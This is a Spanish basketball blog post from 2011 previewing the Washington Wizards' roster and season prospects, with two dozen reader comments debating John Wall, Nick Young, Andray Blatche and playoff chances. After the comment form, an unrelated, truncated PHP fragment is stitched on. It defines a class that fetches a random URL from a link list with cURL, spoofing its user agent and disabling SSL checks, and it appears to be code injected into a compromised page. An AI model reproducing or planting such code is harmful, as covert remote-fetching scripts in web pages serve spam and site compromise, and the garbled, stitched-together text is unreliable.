Washington Wizards: Año 1 después del 0

16 de December de 2011 por TheDeerHunter

Nos atrevemos a decir (y no es poco) que pase lo que pase en lo que queda de “December Madness” desde el día de hoy hasta que empiece la competición los Wizards pueden empezar a mirar al futuro desde una perspectiva optimista y estable por primera vez desde hace demasiado tiempo.

La columna vertebral del equipo está formada exclusivamente por jugadores jóvenes y con potencial. Este factor probablemente les aparta de objetivos inmediatos concretos (si hablamos de postemporada) pero les coloca salvo catástrofe en una línea de crecimiento altamente interesante de cara a los próximos años, sin aparente sombra alguna que pueda entorpecer el proceso.

Definitivamente toma las riendas desde ya mismo John “Wonder” Wall y las expectativas están desbocadas para testear su evolución. No le podemos pedir que el día 25 lidere un “golpe de estado” en el Este, pero creemos que pronto estará entre los grandes bases de la liga y a algunos no nos queda dudas que en 2-3 años será all-star. Para ello debe trabajar el tiro y pulir algunos detalles en la dirección. Esta es la temporada perfecta para consolidarse, porque como decimos nadie le va a exigir aún nada.

En condiciones normales la posición de 2 la van a tener razonablemente bien cubierta, en primer término con Nick Young, que no dudo que retendrán porque es uno de los anotadores jóvenes más prometedores. Le falta un punto de cabeza, un punto de sacrificio y alguno más de estabilidad, pero le hemos visto detalles de auténtico artista y las condiciones las tiene. Este año, además partiría desde ya como titular teórico y totalmente consolidado en la plantilla. Eso sí, si terminan haciéndole el jugador que más cobra de la hornada de jóvenes se le va a tener que exigir y él va a tener que responder. Toca hacerse hombre. Le meterá presión Jordan Crawford, otro que gustó bastante la temporada pasada. Hambre y cualidades. Perfecto para una segunda unidad… porque verle de titular significaría que algo no ha funcionado. Por último han fichado también a Roger Mason. Desconozco si es para forzar la máquina en la negociación con Young o por si esperan sinceramente obtener algún rendimiento de él.

En la posición de 3 a los Wizards les ha tocado la lotería por partida doble. Primero porque pescaban a Jan Vesely en la velada del draft. Es un jugador que habrá que verle en su actual contexto, pero que ya se ha ganado halo de figura en Europa y tiene una pinta fantástica.

Segundo porque hasta el día de hoy han podido amnistiar a Rashard Lewis y así dirigir según les convenga su contratazo, que era la única mancha del panorama.Pero ahora mismo no les molesta e incluso les ayuda a llegar al mínimo salarial que marca el nuevo convenio. Hacen bien en contar con él. El curso que viene pasará a ser un expiring fascinante y quizás nunca tengan que utilizar la famosa cláusula. Para este equipo las cualidades dentro-fuera de Rashard podrían resultar excelentes, siempre que no signifique cortar la progresión de Vesely.

Adicionalmente disponen de otro joven más: Chris Singleton, uno de los mejores, si no el mejor, defensores de la pasada temporada en la NCAA.

Si Wall debe ser el líder indiscutible, para mí el techo de lo que alcance este proyecto lo marcará Andray Blatche. Llegó siendo casi un chiquillo y ha disfrutado de una maduración perfecta. Desde ya, está en condiciones de mirarle a la cara a la mayor parte de interiores de la liga pero le falta un escalón más para ser verdaderamente dominante. Sigue siendo muy joven y con cierta tendencia a la irregularidad. Este año será clave porque le van a atar en corto. Por dentro recibirá la inestimable ayuda de Rashard (que intuyo podría participar muchos minutos de 4) y/o también la de Turiaf, aunque habrá que ver si sigue con su misma propensión a las lesiones de los últimos años.

Finalmente ponemos una guinda muy grande y con los brazos muy largos en la posición de 5, JaVale McGee. Tiene todas las condiciones del mundo para terminar siendo un buen pívot. A ver si sabe crecer más allá de estatura y envergadura.

Quinteto: John Wall, Nick Young, Jan Vesely, Andray Blatche, Javale McGee
6º hombre: Rashard Lewis

Pronóstico: 1/3 de victorias. Fuera de Playoffs.

Comenta

24 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Bueno, habrá que ver de nuevo este año a los Wizards. Pinta bien la regeneración y de hecho, son uno de los equipos que más mola ver por el este. Si incluímos a Clippers, incluso de los más vistosos en la NBA. Juegan rápido, con el descaro de John Wall, y ya lo has dicho todo, con muchos jóvenes muy prometedores como Young, Blactche y Magee que aseguran espectáculo por lo menos. Molan mucho los Wizards. A ver si no se cumple tu pronóstico y se meten en post temporada

      Citar

  2. dsromero dice:
    #2

    la verdad es que es uno de los equipos que más sorpresas puede dar por que un grupo tan joven si consigue ir evolucionando….. comparto el deseo de sancho88 de verlos entrar en playoff

      Citar

  3. Vader dice:
    #3

    Miami
    Chicago
    Orlando
    Celtics
    Knicks
    Indiana
    Atlanta
    Sixers
    Bucks
    Nets

    Veo difícil que se metan en playoff y tampoco creo que les convenga. Mejor para ellos tener una buena eleccion en el próximo draft.

    Saludos

      Citar

  4. nach dice:
    #4

    Pues yo creo que lo mejor para ellos sería no entrar esta temporada en PO para poder pescar en le draft algo interesante para redondear el equipo para tener ya el año que viene el objetivo obligatorio de ir a PO

      Citar

  5. GreenPride dice:
    #5

    Empezamos los análisis con un equipo prometedor pero a mi juicio todavía demasiado inexperto para poder llegar a hacer algo en este año e incluso en el próximo. Wall tiene que ir puliendo sus defectos y empezar a liderar claramente al equipo. Tiene un puñado de jugadores jóvenes a destacar (Young, Vesely, Blatche, McGee) a los que habrá que ver cómo maduran. Si todos progresan puede ser un equipo muy interesante y divertido de ver. Que la temporada sea tan apretada podría venirles bien por su jóvenes piernas. Año para progresar y ver quién les vale y quién no. Yo también creo que quedarán fuera de playoffs y que les conviene para seguir cogiendo gente joven de calidad para su prometedor futuro. Su momento aún no ha llegado

      Citar

  6. HisRoyalAirness dice:
    #6

    Pues ya sé que me van a caer palos por todos lados pero a mí Wall me sigue pareciendo que tiene mucho halo de estrellita, un gran físico y poco más. No tengo tan clara esa progresión fulgurante que se le anticipa.
    McGee otro tanto de lo mismo, nome dice demasiado, al igual que Young que me parece el típico 2 “tiramandarinas” y con un concepto de equipo nulo.
    Veo mucho talento pero no sé si lograrán la madurez que hace falta para encauzarlo.

    Gran análisis Deer, as usual

      Citar

  7. Sancho88 dice:
    #7

    Si Lewis cogiese las riendas del equipo, eso que dices cambiaría, porque siempre se necesita alguien con experiencia para hacer un grupo fuerte. Pero me parece que Lewis siempre ha sido un maquillador de estadísticas y se la ha pelao bastante el equipo, salvo el año del primer anillo de Pau, y tb tengo mis dudas, ya que fueron Nelson-Turkoglu-Gortat-Howard los que más comprometidos se les veía. Creo que aquí nadie está dando favoritos a los Wizards para llegar muy lejors, pero sí es verdad que en un calendario tan apretado de partidos, un equipo joven y vistoso como este puede dar sorpresas, y tb alegrar una liga que cada día está mas mustia, todo sea dicho, y en la que ver partidos entretenido está complicado, a pesar de jugarse dos mil y pico todos los años.

      Citar

  8. HisRoyalAirness dice:
    #8

    Reconozco que parte de mi animadversión hacia John Wall viene de cuando estaba viendo su debut e hizo esto:

    http://www.youtube.com/watch?v=dOMsbyp9QFA&feature=related

    Antes si un rookie hacía esto un veterano le daba una colleja que se le quitaban las ganas; bueno, mejor dicho, antes los rookies no hacían una fantasmada semejante

      Citar

  9. melo15 dice:
    #9

    A mi me parece que los wizards son el equipo con mas potencial de la liga ( los clippers ya no cuentan) y tienen a wall que a pesar de lo que vosotros deciis me parece un jugador con un fisico impresionante, un potencial impresionante y un tiro interior brutal

      Citar

  10. Q dice:
    #10

    A mi Blatche cuando quiere me parece un escándalo de jugador. Muy habilidoso con el balón para la altura que tiene, es capaz de anotar encarando a su defensor y driblándole, otra cosa es que no esté muy bien de la cabeza.
    A este equipo les falta un veterano que los lidere y ese no es Rashard.

      Citar

  11. portu dice:
    #11

    Les falta todo lo q habéis comentado, pero tb creo q les falta algo de tiro exterior q compense los huecos q va a dejar el defensor de Wall y la ayuda q aparezca, un triplista nato de esos de la esquinita les iría de perlas, al parecer están intentando q Vesely modifique su mecánica de tiro de 3 y por el momento lleva airballs a punta pala, ja,ja. En ese juego exterior y sobretodo en el interior creo q tb les faltará defensa, sobretodo en la posición de 2, pq Vesely sólo con su envergadura ya ayudará muchísimo. McGee es bestial para ir al tapón e intimidar, pero ni él ni Blatche, ni Rashard son gente de pegarse en el 1×1, y por el Este ya hay parejas interiores con las q hay q fajarse duro.

      Citar

  12. Sancho88 dice:
    #12

    HisRoyalAirness:
    Reconozco que parte de mi animadversión hacia John Wall viene de cuando estaba viendo su debut e hizo esto:

    http://www.youtube.com/watch?v=dOMsbyp9QFA&feature=related

    Antes si un rookie hacía esto un veterano le daba una colleja que se le quitaban las ganas; bueno, mejor dicho, antes los rookies no hacían una fantasmada semejante

    WOW… pero no se lo tengas en cuenta hombre… este es el baile que hacía en los Wildcats, y luego se fueron sumando Cousins, Aminu, Bledsoe… pero no considero que sea ninguna vacilada. Es su baile macho. Cuando lo hacía Shaq o hace LB todo el show no decimos nada. Forma parte del espectáculo, nada mas

      Citar

  13. melo15 dice:
    #13

    en eso tienes razon portu ni wall ni vasely tienen tiro exterior y young no se como va y tambien creo que les hace falta un escolta defensor (tony allen?)

      Citar

  14. Esteban dice:
    #14

    que tienen cierto futuro lo comparto, ahora de ahi a creer que pueden estar en PO esta año es una locura

    repasemosa, wall sera una base fantastico en el futuro, quiza esta misma temporada, pero no es jason kidd por el momento, hara un 20-10, pero maquillado por los partidos liquidados desde temprano

    young, es una mentira, anota pero otro que sus numeros estan inflados por los ultimos cuartos regalados que tienen los wizards

    crawford, le tengo mas fe, pero dista de ser un jugador determinante en un equipo ganador por el momento

    LEWIS? quien esta tan loco para creer que se comprometera con este equipo? no lo hizo con orlando peleando por algo menos aqui, se dedicara a cobrar sus millones y poco mas

    vasely, le faltan 8 kilos par jugar en la nba, lo veo denuevo en europa dentro de poco, ojala me equivoque, pero sacando a kirilenko y kukoc, a los aleros altos y fragiles europeos no les va a bien en la nba

    blatche, lejos esta de ser un buen jugador en un equipo ganador

    mcgee, otro mas de lo mismo

    en fin, parecen tener un gran futuro, por edad y estadisticas, pero no olvidemos lo malos que fueron el año pasado, muchos de los puntos que tienen wall, young, crawford y blatche por partido, son fruto de jugar ultimos cuartos con diferencias de 20 o mas puntos, o jugar todo el partido perdiendo por cierto margen cuando los grandes equipos le dan soga hasta liquidarlos

    todos estos jovenes, solo podrian ser llamativos, si en la proxima agencia libre fichan a howard y un alero como wallace, amnistia mediate de lewis, menos que eso loteria…

      Citar

  15. melo15 dice:
    #15

    pues para mi, creo que los wizards no tendrian que fichar a nadie en plan: howard o wallace yo creo que el año que viene en el draft tendrian que fichar a harrison barnes que es buenisimo i a otro jugador de equipo y ya esta

      Citar

  16. Cocinitas dice:
    #16

    Yo este año tampoco los veo para playoffs, bien es cierto que tienen buena base para hacer un buen equipo en el Este, pero este año aún estan por debajo del nivel de 8 o 9 equipos. El año que viene si liberan los 20 kilos de Lewis tendrán un hueco salarial enorme, el problema es que no creo que logren convencer a Howard para jugar en la capital. Le falta principalmente tiro exterior ya que Wall no mete una a 7 metros, creo que es en lo que deberian centrarse el verano que viene en la agencia libre. Yo este año buscaria un pick alto para el proximo draft que viene cargadito de AP espectaculares, y con eso y un buen escolta o alero tirador si tendrian un buen equipo para pelear la 5 o 6 plaza en el este.

      Citar

  17. The wolf dice:
    #17

    un tio positvo donde los haya…”Bueno, podría haber sido peor” (C. Billups). Así que, por lo que parece, ni se retira ni suplicará el ‘buyout

      Citar

  18. Denise dice:
    #18

    Me encanta este equipo, pro calidad y potencial estaría entre los 8 mejores del Este. Lo malo es la cabeza.
    Lewis y Blatche son dos cracks, si tienen ganas de jugar, el primero destroza partidos y su posicion de 3-4 desequilibra, y el otro tiene condiciones para ser un 20-10.
    Mc Gee otro crack que me encanta y que si mejora ofensivamente rondará el 15-12-3 (puntos, rebotes, tapones).
    Y John Wall tiene mucho margen de mejora, a mi no me gustaba mucho Derrick Rose al principio.
    Aparte de eso, jugadores muy interesantes como Young, Crawford y Vesely, falto de tiro exterior todavía pero que podría ser el nuevo Kirilenko, y jugadores aceptables de banquillo como Turiaf o Trevor Booker.

    Los meto en playoffs, confio este año en Rashard y Blatche.

      Citar

  19. Blade Petrovic dice:
    #19

    Yo creo q dentro de 1-2 años estaran en playoffs.Haber si young cuaja una buena temporada y no es tan irregular.
    Pra mi del 10 al 12 del este

      Citar

  20. Esteban dice:
    #20

    contemos cuantos equipos son peores que ellos… los raptors, los cavs hasta ahi nomas, charlotte y quiza detroit, en el oeste sacramento, minesota hasta ahi nomas y utah,

    quiza pueden terminar por ensima de algunos de estos, mas que eso seria un batacazo

      Citar

  21. HisRoyalAirness dice:
    #21

    Sancho88: WOW… pero no se lo tengas en cuenta hombre… este es el baile que hacía en los Wildcats, y luego se fueron sumando Cousins, Aminu, Bledsoe… pero no considero que sea ninguna vacilada. Es su baile macho. Cuando lo hacía Shaq o hace LB todo el show no decimos nada. Forma parte del espectáculo, nada mas

    ya sé que lo hacían en la NCAA pero una cosa es que lo haga Shaquille (aunque nunca me gustó su faceta circense) o Lebron que ya llevan unos años en la liga (a Lebron lo pongo a parir siwmpre, que conste) y otra que un rookie en SU PRIMER PARTIDO haga la vacilada

      Citar

  22. melo15 dice:
    #22

    En el 2k fundes con wall XD( de verdad es buenisimo)

      Citar

  23. RSB dice:
    #23

    No se les puede pedir playoff este año, cierto. Aunque deberían de quedar novenos o décimos en el este por el potencial que tienen. La duda es saber si estos jugadores madurarán esta temporada y exhibirán un poco de compromiso, o se hundirán en los últimos puestos de conferencia. Lo último sería muy mala señal (aunque paradójicamente, sería bueno de cara al draft)

      Citar

  24. TheDeerHunter dice:
    #24

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>